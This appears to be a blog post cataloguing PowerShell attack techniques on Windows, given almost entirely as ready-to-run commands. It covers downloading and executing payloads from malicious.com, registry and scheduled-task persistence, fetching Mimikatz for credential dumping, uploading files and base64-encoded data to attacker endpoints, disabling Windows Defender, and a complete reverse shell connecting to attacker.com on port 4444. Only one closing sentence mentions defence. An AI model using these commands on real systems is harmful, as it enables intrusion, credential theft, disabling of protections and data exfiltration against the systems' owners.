Leveraging PowerShell During Exploitation
Leveraging PowerShell during exploitation is a common technique used by attackers due to its powerful capabilities and its presence on most Windows systems. Here are several methods and techniques for using PowerShell during exploitation:
1. Initial Access and Reconnaissance
a. Download and Execute Malicious Scripts:
Attackers can use PowerShell to download and execute scripts from remote servers.
Invoke-WebRequest -Uri http://malicious.com/malware.ps1 -OutFile C:\Windows\Temp\malware.ps1
powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\malware.ps1
b. Gathering System Information:
PowerShell can be used to gather detailed information about the target system.
Get-Host
Get-Process
Get-Service
Get-WmiObject -Class Win32_ComputerSystem
2. Lateral Movement
a. Remote Command Execution:
PowerShell can be used to execute commands on remote systems if the attacker has valid credentials.
Invoke-Command -ComputerName RemotePC -ScriptBlock { Get-Process }
b. Using PsExec via PowerShell:
PsExec is a tool that allows for remote command execution, and it can be executed through PowerShell.
Start-Process -FilePath "PsExec.exe" -ArgumentList "\\RemotePC -u User -p Password cmd.exe"
3. Persistence
a. Creating Scheduled Tasks:
Attackers can use PowerShell to create scheduled tasks that execute malicious payloads.
$Action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument 'C:\Windows\Temp\malicious.ps1'
$Trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName 'UpdateTask' -User 'Administrator' -Password 'password'
b. Modifying Registry for Persistence:
PowerShell can be used to modify the Windows registry to achieve persistence.
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Windows\Temp\malicious.exe'
4. Credential Dumping
a. Using Mimikatz:
Attackers can use PowerShell to download and execute Mimikatz, a tool for extracting passwords.
Invoke-WebRequest -Uri http://malicious.com/mimikatz.exe -OutFile C:\Windows\Temp\mimikatz.exe
Start-Process -FilePath C:\Windows\Temp\mimikatz.exe
5. Data Exfiltration
a. Uploading Files to a Remote Server:
PowerShell can be used to upload files to an attacker’s server.
$FilePath = "C:\sensitive_data.txt"
$Server = "http://malicious.com/upload"
Invoke-RestMethod -Uri $Server -Method Post -InFile $FilePath -ContentType "multipart/form-data"
b. Encoding and Sending Data:
Attackers can encode sensitive data and send it to a remote server.
$Data = Get-Content "C:\sensitive_data.txt"
$EncodedData = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Data))
Invoke-RestMethod -Uri "http://malicious.com/receive" -Method Post -Body $EncodedData
6. Bypassing Security Mechanisms
a. Bypassing Execution Policy:
PowerShell scripts can be executed even if the execution policy is restricted.
powershell.exe -ExecutionPolicy Bypass -File malicious.ps1
b. Disabling Antivirus and Windows Defender:
Attackers can disable security features using PowerShell.
Set-MpPreference -DisableRealtimeMonitoring $true
Stop-Service -Name WinDefend
7. Creating Reverse Shells
a. PowerShell Reverse Shell:
Attackers can create a reverse shell to control the target system remotely.
$client = New-Object System.Net.Sockets.TCPClient('attacker.com', 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
By leveraging PowerShell, attackers can perform a wide range of malicious activities, from initial reconnaissance to data exfiltration. It’s crucial for defenders to monitor PowerShell activity and implement security controls to mitigate these threats.
Note: Blog based on publicly available information.